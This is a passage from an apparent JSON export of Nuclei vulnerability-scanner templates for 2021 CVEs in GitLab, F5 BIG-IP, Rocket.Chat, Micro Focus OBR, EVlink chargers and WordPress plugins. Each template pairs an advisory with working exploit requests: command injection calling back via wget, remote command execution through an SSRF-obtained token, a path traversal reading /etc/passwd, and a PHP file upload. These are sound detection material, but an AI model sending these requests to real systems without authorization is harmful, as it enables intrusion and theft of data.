\"81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3\"\n - \"83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1\"\n - \"93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b\"\n - \"969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e\"\n - \"9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b\"\n - \"9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e\"\n - \"a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528\"\n - \"a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9\"\n - \"ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5\"\n - \"ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8\"\n - \"aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b\"\n - \"b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711\"\n - \"b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445\"\n - \"bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca\"\n - \"be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a\"\n - \"bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7\"\n - \"bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4\"\n - \"bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218\"\n - \"c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4\"\n - \"c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c\"\n - \"d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71\"\n - \"d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb\"\n - \"d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c\"\n - \"d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f\"\n - \"dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56\"\n - \"def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3\"\n - \"e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a\"\n - 
\"e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0\"\n - \"eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687\"\n - \"ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d\"\n - \"ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd\"\n - \"ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83\"\n - \"f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812\"\n - \"f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649\"\n - \"f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11\"\n condition: or\n\n extractors:\n - type: regex\n group: 1\n regex:\n - '(?:application-)(\\S{64})(?:\\.css)'\n# digest: 490a00463044022021787cd9270a230364edc25682b32eedd71949d7c6a77c9b84308a540f85761502203bbfe2d4d8ee766566ca25be55039a765ee27d86e8b66ff4f6971796a255e1e0:922c64590222798bb761d5b6d8e72950", "hash": "e27e15214f88c00baf41ffc85f78c86f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30828a" }, "name": "CVE-2021-22214.yaml", "content": "id: CVE-2021-22214\n\ninfo:\n name: Gitlab CE/EE 10.5 - Server-Side Request Forgery\n author: Suman_Kar,GitLab Red Team\n severity: high\n description: |\n GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. 
These CVEs are:\n - CVE-2021-39935\n - CVE-2021-22214\n - CVE-2021-22175\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further attacks on the system.\n remediation: |\n Upgrade GitLab CE/EE to a patched release. The affected range starts at 10.5 and is not limited to that minor version, so consult the GitLab advisories for CVE-2021-22214, CVE-2021-39935 and CVE-2021-22175 in the references for the exact fixed versions. As an interim mitigation, disable outbound requests to the local network from webhooks and integrations, since the flaw is only reachable when such requests are allowed.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22214\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39935\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22175\n - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html\n - https://docs.gitlab.com/ee/api/lint.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 8.6\n cve-id: CVE-2021-22214\n cwe-id: CWE-918\n epss-score: 0.09317\n epss-percentile: 0.94551\n cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gitlab\n product: gitlab\n shodan-query: http.title:\"GitLab\"\n tags: cve2021,cve,gitlab,ssrf\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true\"\n\n body: |\n {\"content\": \"include:\\n remote: http://127.0.0.1:9100/test.yml\"}\n\n headers:\n Content-Type: application/json\n host-redirects: true\n max-redirects: 3\n matchers:\n - type: word\n part: body\n words:\n - \"does not have valid YAML syntax\"\n# digest: 4b0a00483046022100ff420e3f4d9d72d0aa090c7edd70646581bc6078a639d8c4eecddd0e337109bc022100f49642428c995841527b11d305d4c38776bd64b61bd40052ed4faca9e93d9c75:922c64590222798bb761d5b6d8e72950", "hash": "ca4908dd2a88eb67100587e9f3e6ca99", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30828b" }, "name": "CVE-2021-22502.yaml", "content": "id: CVE-2021-22502\n\ninfo:\n name: Micro Focus Operations Bridge Reporter - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: |\n Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code 
execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. This template confirms the flaw by injecting a backtick-wrapped wget call into the userName field of the unauthenticated LogonResource endpoint and waiting for an out-of-band callback, so a positive result means a command was actually executed on the target; treat the check as intrusive.\n remediation: |\n Apply the security patches or hotfix provided by Micro Focus for Operations Bridge Reporter 10.40 (see KM03775947 in the references) to mitigate this vulnerability.\n reference:\n - https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md\n - https://softwaresupport.softwaregrp.com/doc/KM03775947\n - https://www.zerodayinitiative.com/advisories/ZDI-21-153/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22502\n - https://www.zerodayinitiative.com/advisories/ZDI-21-154/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-22502\n cwe-id: CWE-78\n epss-score: 0.95993\n epss-percentile: 0.99434\n cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: microfocus\n product: operation_bridge_reporter\n tags: cve2021,cve,microfocus,obr,rce,kev\n\nhttp:\n - raw:\n - |\n POST /AdminService/urest/v1/LogonResource HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"userName\":\"something `wget {{interactsh-url}}`\",\"credential\":\"whatever\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"An error occurred\"\n - \"AUTHENTICATION_FAILED\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 401\n# digest: 4b0a00483046022100ed38ca4d38ee6a8827ce0cb424c58a1c6f7273942f72850e30a51a47a8ced4e80221009e6de8be7a1e2e0bca9cba77fac3f7d24b41648cf318f9678bc391420570f366:922c64590222798bb761d5b6d8e72950", "hash": "5c486eebfd9c206aa10dd19584df30aa", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30828c" }, "name": "CVE-2021-22707.yaml", "content": "id: CVE-2021-22707\n\ninfo:\n name: EVlink 
City < R8 V3.4.0.1 - Authentication Bypass\n author: ritikchaddha,dorkerdevil\n severity: critical\n description: |\n A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.\n remediation: |\n Upgrade to EVlink City R8 V3.4.0.1 or later to fix the authentication bypass vulnerability.\n reference:\n - https://codeberg.org/AmenoCat/CVE-2021-22707-PoC/raw/branch/main/exploit.sh\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22707\n - http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-06\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-22707\n cwe-id: CWE-798\n epss-score: 0.27092\n epss-percentile: 0.96671\n cpe: cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: schneider-electric\n product: evlink_city_evc1s22p4_firmware\n shodan-query: title:\"EVSE web interface\"\n fofa-query: title=\"EVSE web interface\"\n tags: cve2021,cve,evlink,auth-bypass,schneider-electric\n\nhttp:\n - raw:\n - |\n GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n Cookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '?worker=Cluster\" name=\"cluster\" id=\"id_cluster'\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100c2ddc524c81bab04c11b51b6377bb61707042a4f1c9007e4d4fc8dd4b9c415ba022100df0afe79fce39ccb1592f7893da9933c9b1a645a95fa1e6be05a57e53c2b67aa:922c64590222798bb761d5b6d8e72950", "hash": "49cc1d5656f09a46e2d64d3fd501b6f5", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30828d" }, "name": "CVE-2021-22873.yaml", "content": "id: CVE-2021-22873\n\ninfo:\n name: Revive Adserver <5.1.0 - Open Redirect\n author: pudsec\n severity: medium\n description: Revive Adserver before 5.1.0 contains an open redirect vulnerability via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks.\n remediation: |\n Upgrade Revive Adserver to version 5.1.0 or later to mitigate this vulnerability.\n reference:\n - https://hackerone.com/reports/1081406\n - https://github.com/revive-adserver/revive-adserver/issues/1068\n - http://seclists.org/fulldisclosure/2021/Jan/60\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22873\n - http://packetstormsecurity.com/files/161070/Revive-Adserver-5.0.5-Cross-Site-Scripting-Open-Redirect.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-22873\n cwe-id: CWE-601\n epss-score: 0.00922\n epss-percentile: 0.82556\n cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 6\n vendor: revive-adserver\n product: revive_adserver\n shodan-query: http.favicon.hash:106844876\n tags: cve2021,cve,hackerone,seclists,packetstorm,redirect,revive,revive-adserver\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh\"\n - \"{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh\"\n - \"{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh\"\n - \"{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh\"\n - \"{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh\"\n - \"{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh\"\n\n stop-at-first-match: true\n host-redirects: true\n max-redirects: 2\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4b0a00483046022100fe9c76568f5c17d3ad5ca41852a87aca6cd7e386594a11c8e7cebc5b7d8a4c80022100d022d0ad67a7f96e9fbbfa6a04d805a775c312dab24b5b5e7ffa55a9f3751390:922c64590222798bb761d5b6d8e72950", "hash": "e5b6de62e1bb0ab506ce24ff532ba438", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30828e" }, "name": "CVE-2021-22911.yaml", "content": "id: CVE-2021-22911\n\ninfo:\n name: Rocket.Chat <=3.13 - NoSQL Injection\n author: tess,sullo\n severity: critical\n description: Rocket.Chat 3.11, 3.12 and 3.13 contains a NoSQL injection vulnerability which allows unauthenticated access to an API endpoint. 
An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary NoSQL queries, leading to unauthorized access, data manipulation, or denial of service.\n remediation: |\n Upgrade Rocket.Chat to a version higher than 3.13 or apply the provided patch to mitigate the vulnerability.\n reference:\n - http://packetstormsecurity.com/files/162997/Rocket.Chat-3.12.1-NoSQL-Injection-Code-Execution.html\n - https://github.com/vulhub/vulhub/tree/master/rocketchat/CVE-2021-22911\n - https://hackerone.com/reports/1130721\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22911\n - https://blog.sonarsource.com/nosql-injections-in-rocket-chat\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22911\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-22911\n cwe-id: CWE-75,NVD-CWE-Other\n epss-score: 0.94773\n epss-percentile: 0.99209\n cpe: cpe:2.3:a:rocket.chat:rocket.chat:3.11.0:-:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: rocket.chat\n product: rocket.chat\n shodan-query: http.title:\"Rocket.Chat\"\n tags: cve2021,cve,rocketchat,nosqli,packetstorm,vulhub,hackerone,rocket.chat,sqli\n\nhttp:\n - raw:\n - |-\n POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"message\": \"{\\\"msg\\\":\\\"method\\\", \\\"method\\\": \\\"getPasswordPolicy\\\", \\\"params\\\": [{\\\"token\\\": {\\\"$regex\\\": \\\"^{{randstr}}\\\"}}] }\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '[error-invalid-user]'\n - '\"success\":true'\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n# digest: 
4a0a0047304502202ceec4399b237de979a8a362eb44fad120bd7bb964bb3fcdbb6d6a01e6557c52022100894d28662f6e764af7d0e5fca1e84474779041d8ac3df6fa020f407efa627421:922c64590222798bb761d5b6d8e72950", "hash": "0774741ce2ade98a38c7461279366fc9", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30828f" }, "name": "CVE-2021-22986.yaml", "content": "id: CVE-2021-22986\n\ninfo:\n name: F5 iControl REST - Remote Command Execution\n author: rootxharsh,iamnoooob\n severity: critical\n description: F5 iControl REST interface is susceptible to remote command execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. This affects BIG-IP 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3; and BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2. Note that this template actively exploits the issue rather than fingerprinting it: the first request abuses the SSRF in the login endpoint to obtain an authentication token, and the second runs the id command through /mgmt/tm/util/bash, so a match means a command was executed on the device and the check should be treated as intrusive.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.\n remediation: |\n Upgrade to a fixed release: BIG-IP 16.0.1.1, 15.1.2.1, 14.1.4, 13.1.3.6 or 12.1.5.3, or BIG-IQ 7.1.0.3 or 7.0.0.2, as applicable (see F5 article K03009991 in the references). Because the attack needs no credentials, restricting network access to the iControl REST interface to trusted management networks reduces exposure until the upgrade is applied.\n reference:\n - https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986\n - https://support.f5.com/csp/article/K03009991\n - http://packetstormsecurity.com/files/162059/F5-iControl-Server-Side-Request-Forgery-Remote-Command-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22986\n - https://github.com/Miraitowa70/POC-Notes\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-22986\n cwe-id: CWE-918\n epss-score: 0.97449\n epss-percentile: 0.99948\n cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: f5\n product: big-ip_access_policy_manager\n tags: 
cve,cve2021,bigip,rce,kev,packetstorm,f5\n\nhttp:\n - raw:\n - |\n POST /mgmt/shared/authn/login HTTP/1.1\n Host: {{Hostname}}\n Accept-Language: en\n Authorization: Basic YWRtaW46\n Content-Type: application/json\n Cookie: BIGIPAuthCookie=1234\n Connection: close\n\n {\"username\":\"admin\",\"userReference\":{},\"loginReference\":{\"link\":\"http://localhost/mgmt/shared/gossip\"}}\n - |\n POST /mgmt/tm/util/bash HTTP/1.1\n Host: {{Hostname}}\n Accept-Language: en\n X-F5-Auth-Token: {{token}}\n Content-Type: application/json\n Connection: close\n\n {\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n\n matchers:\n - type: word\n words:\n - \"commandResult\"\n - \"uid=\"\n condition: and\n\n extractors:\n - type: regex\n name: token\n group: 1\n regex:\n - \"([A-Z0-9]{26})\"\n internal: true\n part: body\n\n - type: regex\n group: 1\n regex:\n - \"\\\"commandResult\\\":\\\"(.*)\\\"\"\n part: body\n# digest: 4a0a0047304502205b6103e9c4287d5da718fb79ec432f89995dbdb62f4452ca4f0b7984d1c4bb11022100ece1ce92a2ba853152334fb7ed172e4d6214d384761a67459317cf8e857e8128:922c64590222798bb761d5b6d8e72950", "hash": "21ba934d9003ace7ff48079133b5367c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308290" }, "name": "CVE-2021-23241.yaml", "content": "id: CVE-2021-23241\n\ninfo:\n name: MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion\n author: daffainfo\n severity: medium\n description: MERCUSYS Mercury X18G 1.0.5 devices are vulnerable to local file inclusion via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the router.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the LFI vulnerability and ensure proper input validation is 
implemented.\n reference:\n - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md\n - https://www.mercusys.com/en/\n - https://www.mercurycom.com.cn/product-521-1.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-23241\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-23241\n cwe-id: CWE-22\n epss-score: 0.00365\n epss-percentile: 0.71874\n cpe: cpe:2.3:o:mercusys:mercury_x18g_firmware:1.0.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mercusys\n product: mercury_x18g_firmware\n tags: cve2021,cve,iot,lfi,router,mercusys\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/loginLess/../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502200f34b2dae1c708ea8b7b9ef50190ec33a2e2a0f017295036db5dab2536f72dae022100c38e6b2dd3553581831251319d8596d8ecf29013ef41275641dfca0de46304a5:922c64590222798bb761d5b6d8e72950", "hash": "5c6f13457db595db4f8e33df7c196d40", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308291" }, "name": "CVE-2021-24145.yaml", "content": "id: CVE-2021-24145\n\ninfo:\n name: WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload\n author: theamanrawat\n severity: high\n description: |\n WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. 
This can possibly lead to remote code execution.\n impact: |\n Remote code execution\n remediation: Fixed in version 5.16.5.\n reference:\n - https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610\n - https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip\n - https://github.com/dnr6419/CVE-2021-24145\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24145\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2021-24145\n cwe-id: CWE-434\n epss-score: 0.94936\n epss-percentile: 0.99118\n cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: webnus\n product: modern_events_calendar_lite\n framework: wordpress\n tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Content-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875\n\n -----------------------------132370916641787807752589698875\n Content-Disposition: form-data; name=\"feed\"; filename=\"{{randstr}}.php\"\n Content-Type: text/csv\n\n \n\n -----------------------------132370916641787807752589698875\n Content-Disposition: form-data; name=\"mec-ix-action\"\n\n import-start-bookings\n -----------------------------132370916641787807752589698875--\n - |\n GET /wp-content/uploads/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - contains(header_3, \"text/html\")\n - status_code_3 == 200\n - contains(body_3, 'CVE-2021-24145')\n condition: and\n# digest: 
4b0a00483046022100a2bd2c8892466618dbe6b82f2a50a434408d50f09f53c604bad403b9e4edba02022100c35eb57fb6d3f1e2a67234e21bb4bc2c28dd4069d00727518ded026d6d633379:922c64590222798bb761d5b6d8e72950", "hash": "dcdf87f8b5734a91f2f5c965844f0619", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308292" }, "name": "CVE-2021-24146.yaml", "content": "id: CVE-2021-24146\n\ninfo:\n name: WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure\n author: random_robbie\n severity: high\n description: WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to export all event data in CSV or XML format. This template issues the CSV export request itself and matches on a text/csv response whose filename contains mec-events, so a positive match means event data was actually retrieved from the target.\n impact: |\n An unauthenticated attacker can download the complete event export in CSV or XML format and read whatever event details it contains.\n remediation: |\n Update to the latest version of the Modern Events Calendar Lite plugin (5.16.5 or higher) to fix the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc\n - http://packetstormsecurity.com/files/163345/WordPress-Modern-Events-Calendar-5.16.2-Information-Disclosure.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24146\n - https://github.com/Hacker5preme/Exploits\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-24146\n cwe-id: CWE-862,CWE-284\n epss-score: 0.02727\n epss-percentile: 0.90292\n cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: webnus\n product: modern_events_calendar_lite\n framework: wordpress\n tags: cve,cve2021,wpscan,packetstorm,wordpress,wp-plugin,webnus\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: 
header\n words:\n - \"mec-events\"\n - \"text/csv\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b31aad67d362d0077658450c16624d12ced8ad163722f1b93e91549d5c6763ed022100fd8913dc9b6791ef83d3094c8f59276a2802b77a20cbf55c3f760ccf03f401e8:922c64590222798bb761d5b6d8e72950", "hash": "3bc86866da7dbb11723eb0c4208905a4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308293" }, "name": "CVE-2021-24150.yaml", "content": "id: CVE-2021-24150\n\ninfo:\n name: WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery\n author: theamanrawat\n severity: high\n description: |\n WordPress Like Button Rating plugin before 2.6.32 is susceptible to server-side request forgery. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Update the WordPress Like Button Rating plugin to version 2.6.32 or later.\n reference:\n - https://wpscan.com/vulnerability/6bc6023f-a5e7-4665-896c-95afa5b638fb\n - https://wordpress.org/plugins/likebtn-like-button/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24150\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-24150\n cwe-id: CWE-918\n epss-score: 0.02268\n epss-percentile: 0.88473\n cpe: cpe:2.3:a:likebtn-like-button_project:likebtn-like-button:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: likebtn-like-button_project\n product: likebtn-like-button\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button,likebtn-like-button_project\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}\" HTTP/1.1\n Host: 
{{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Interactsh Server\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502200ae092b2adea843bbfc67e272e1bbcdda95f6b1ba06ecb35d0f8be5f3de1461b0221009750e56702e2ad63ef146d19101a646b2f66d94372d7809750db43ee23d5a703:922c64590222798bb761d5b6d8e72950", "hash": "79a966c3647a615c274818daf9c1836e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308294" }, "name": "CVE-2021-24155.yaml", "content": "id: CVE-2021-24155\n\ninfo:\n name: WordPress BackupGuard <1.6.0 - Authenticated Arbitrary File Upload\n author: theamanrawat\n severity: high\n description: |\n WordPress Backup Guard plugin before 1.6.0 is susceptible to authenticated arbitrary file upload. The plugin does not ensure that imported files are in SGBP format and extension, allowing high-privilege users to upload arbitrary files, including PHP, possibly leading to remote code execution.\n impact: |\n Remote code execution\n remediation: Fixed in version 1.6.0.\n reference:\n - https://wpscan.com/vulnerability/d442acac-4394-45e4-b6bb-adf4a40960fb\n - 